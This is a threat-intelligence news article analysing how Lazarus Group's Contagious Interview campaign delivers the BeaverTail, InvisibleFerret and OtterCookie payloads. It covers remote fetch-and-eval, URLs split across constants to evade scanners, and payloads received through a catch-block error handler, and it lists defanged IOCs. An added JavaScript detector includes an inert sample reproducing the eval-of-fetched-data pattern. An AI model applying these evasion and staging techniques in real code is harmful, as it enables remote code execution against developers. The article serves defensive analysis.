Lazarus Group enhances malware delivery by using new techniques

gbhackers.com · Lucas Mancilha · 8 months ago · news
Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique

By Lucas Mancilha, July 30, 2025

The Contagious Interview campaign conducted by the Lazarus Group continues to expand its capabilities. We have observed rapid evolution in the delivery mechanisms for the campaign's main payloads: BeaverTail, InvisibleFerret, and OtterCookie. In this article we discuss the innovations in the delivery techniques used by the group and show that the group's modus operandi is preserved throughout the evolution of its code. To this end, we analyzed three distinct malicious projects that were highly active in campaigns.

Delivery Mechanism 1: Eval Function

[Figure 1 – Initial POST request to the delivery domain]

In one of the projects, the group's developers implemented a code snippet that performs a POST request to an external address, fashdefi[.]store, on port 6168. After the request, the code captures the response, stores it in the token object, and executes the content using the eval() function.

[Figure 2 – Execution of the POST request with the curl command-line tool]

In this way, the snippet, located within the catch block, removes the need for the main payload (in this case InvisibleFerret) to be written directly into the project's main code, as was observed in projects prior to the analysis period of this article. This evades previously created detection mechanisms that relied solely on direct scanning of the main code.
Delivery Mechanism 2: False Token

[Figure 3 – URL parts declared separately in the project]

In a distinct project, the group implemented new strategies to complicate code analysis by the automated tools used to scan for and detect malicious code. In this code snippet, the developers took care to split the entire URL into several parts within the code. The attackers used the legitimate Vercel.App hosting platform as a command and control (C2) server, which serves the project's favicon.

[Figure 3.1 – Constant "url" that concatenates the URL, and constant "options" that holds the request and its headers]

These two constants add more layers to the code flow: when the request is made by the function "req", which is stored in another constant named "doing", the code has a better chance of evading static analysis tools that rely on pattern matching, as well as sandbox environments that do not analyse the code at runtime.

[Figure 3.2 – Constant "doing", which stores the request function]

Following the code's construction flow, the "doing" constant, when called, executes the entire request operation. In the end, within the try/catch block, it uses the eval() function to receive the malicious code, as shown below:

[Figure 4 – POST request adding the token "logo" to receive the encoded payload]

Using a sandbox platform, we verified the content delivered when the "bearrtoken: logo" header is omitted from the request, confirming that a favicon is indeed served for the malicious project.

[Figure 5 – Accessing the C2 without the proper token delivers the favicon of the malicious project]

Based on this information, we pivoted on the favicon and identified reuse of the image across several prior projects attributed to the North Korean group and the Contagious Interview campaign.
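The two mechanisms above share three traits a static check can look for: a URL split across several constants and concatenated later, eval() applied to data that is not a string literal, and code execution placed inside a catch block. The following heuristic scanner, added here as an illustration and not code from the article or from the analysed projects, folds string constants back together and reports those traits; the sample it scans is constructed and inert (no real host), and the names bearrtoken and errorHandler are taken from the article's description.

```javascript
// Added example: heuristic scanner for the three staging traits described above
// (URL split across constants, eval() of non-literal data, execution inside catch).
const LITERAL = String.raw`'[^'\n]*'|"[^"\n]*"`;
const TERM = String.raw`(?:${LITERAL}|[A-Za-z_$][\w$]*)`;
// `const name = term + term + ...;` where each term is a string literal or an identifier
const DECL = new RegExp(
  String.raw`(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*(${TERM}(?:\s*\+\s*${TERM})*)\s*;`, 'g');
const DYNAMIC_EVAL = /\beval\s*\(\s*(?!['"`])/;               // eval( not followed by a literal
const CATCH = /\bcatch\s*(?:\([^)]*\))?\s*\{([^{}]*(?:\{[^{}]*\}[^{}]*)*)\}/g; // catch body, 1 nested level
// eval / Function, or any call fed with .response / .data taken from the caught error
const EXEC_IN_CATCH = /\beval\s*\(|\bnew\s+Function\s*\(|\b[A-Za-z_$][\w$]*\s*\([^)]*\.(?:response|data)\b/;
// Resolve string-typed declarations in source order, folding `a + "b" + c` chains
// so a URL split across several constants is reassembled before matching.
function foldStringConstants(src) {
  const consts = new Map(); // name -> { value, terms }
  for (const m of src.matchAll(DECL)) {
    const terms = m[2].match(new RegExp(TERM, 'g'));
    const parts = terms.map(t => /^['"]/.test(t) ? t.slice(1, -1) : (consts.get(t)?.value ?? null));
    if (parts.every(p => p !== null)) consts.set(m[1], { value: parts.join(''), terms: terms.length });
  }
  return consts;
}
// Returns the list of findings; an empty list means none of the traits was seen.
function scanSource(src) {
  const findings = [];
  for (const [name, c] of foldStringConstants(src)) {
    if (c.terms > 1 && /^https?:\/\//i.test(c.value)) findings.push(`split-url ${name} -> ${c.value}`);
  }
  if (DYNAMIC_EVAL.test(src)) findings.push('eval-of-dynamic-data');
  for (const m of src.matchAll(CATCH)) if (EXEC_IN_CATCH.test(m[1])) findings.push('code-execution-in-catch');
  return findings;
}
// Constructed, inert sample laid out like the described projects (no real host;
// `bearrtoken` and `errorHandler` are the names the article mentions).
const SAMPLE = `
const p1 = "https://";
const p2 = "static.example.invalid";
const p3 = "/icons/0";
const url = p1 + p2 + p3;
const options = { method: "GET", headers: { bearrtoken: "logo" } };
async function load() {
  try {
    const res = await axios(url, options);
    eval(res.data);
  } catch (err) { errorHandler(err.response.data); }
}
`;
console.log(scanSource(SAMPLE));
```

The folding step is the part that matters against the split-URL trick: a rule that only greps for a literal domain never sees it, while the reassembled value can be matched against a blocklist or simply surfaced for review.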
[Figure 6 – Hunting other projects using the same favicon]

Delivery Mechanism 3: Try/Catch

The third technique we observed demonstrates a continuous process of innovation built on elements present in previous projects. In this approach the group used a much more precise design, with low detection rates up to the time of writing, preserving its tactic of splitting the communication address for payload delivery so that the URL can be concatenated later (Delivery Mechanism 2) and using the axios library to make the request (Delivery Mechanism 1), this time with the GET method.

[Figure 7 – Using the same tactic demonstrated in Figures 3 and 4 to bypass pattern-matching tools]

As in the other projects, we could expect an eval() function somewhere in the code to receive and execute the main attack payload; in this project, however, they implemented a curious approach.

[Figure 7.1 – Using the same tactic demonstrated in Figure 5: creating a constant and storing a malicious function in it]

The developers astutely replaced the need for an eval() function with a code block programmed to return a 500 error from the API communication. The malicious code is then received within the try/catch block, using the errorHandler() function shown above.

So What?

All the implemented innovations highlight the group's focal point for improvement; the logic of the code snippets that deliver payloads remained the same. However, the number of innovations over a short period of time, the syntax errors present in the code, and the lack of review for those bugs suggest constant use of artificial intelligence (AI) technologies to automate code creation. This raises significant concerns for defense mechanisms that rely only on direct code detection and pattern matching. We can therefore state with high confidence that in the coming months we will see new approaches developed to further reduce the traces left in project code.
There will be a strong focus on continuous improvement in the campaign's delivery phase, demanding greater robustness in previously developed detection rules.

Indicators of Compromise (IOCs):

URLs:
https[:]//cdn-static-server[.]vercel[.]app/icons/212
http[:]//fashdefi[.]store[:]6168/defy/v7
http[:]//bujey[.]store[:]6168/defy/v7
https[:]//bitbucket[.]org/0xhpenvynb/mvp_gamba/src/master/
http[:]//chainlink-api-v3[.]cloud/api/service/token/56e15ef3b5e5f169fc063f8d3e88288e

Project names:
CoinLocator-main
coin-promoting-app-main
0xhpenvynb-mvp_gamba-6b10f2e9dd85

IPs:
144.172.96[.]35
107.189.24[.]80
135.181.123[.]177

Favicon hash:
41ee7ddb2be173686dc3a73a49b4e93bc883ef363acca770f7ede891451122ab

About the author: Lucas Mancilha is a senior malware researcher. He specializes in malware analysis, reverse engineering and analysing APT threats, and is also a regular contributor at The Cyber News.